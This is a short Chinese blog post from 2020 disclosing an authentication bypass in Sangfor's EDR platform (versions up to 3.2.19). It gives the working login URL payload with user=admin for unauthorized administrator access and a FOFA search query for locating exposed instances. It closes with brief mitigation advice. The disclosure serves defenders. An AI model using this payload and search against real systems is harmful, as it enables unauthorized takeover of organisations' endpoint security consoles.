SANGFOR终端检测响应平台任意用户登录漏洞

一、漏洞描述

终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。
攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。

二、漏洞影响版本

<=v3.2.19

三、漏洞验证

payload:https://ip:xx/ui/login.php?user=任意用户名    注:用户名需要存在

1、fofo搜索 title="终端检测响应平台",访问

2、构造payload,访问https://ip:xx/ui/login.php?user=admin,成功未授权登录,查看当前版本发现为3.2.13

 四、漏洞修复建议

1、部署到内网

2、限制特定IP地址访问

3、打补丁

posted @ 2020-08-20 13:31  雨中落叶  阅读(1921)  评论(0编辑  收藏  举报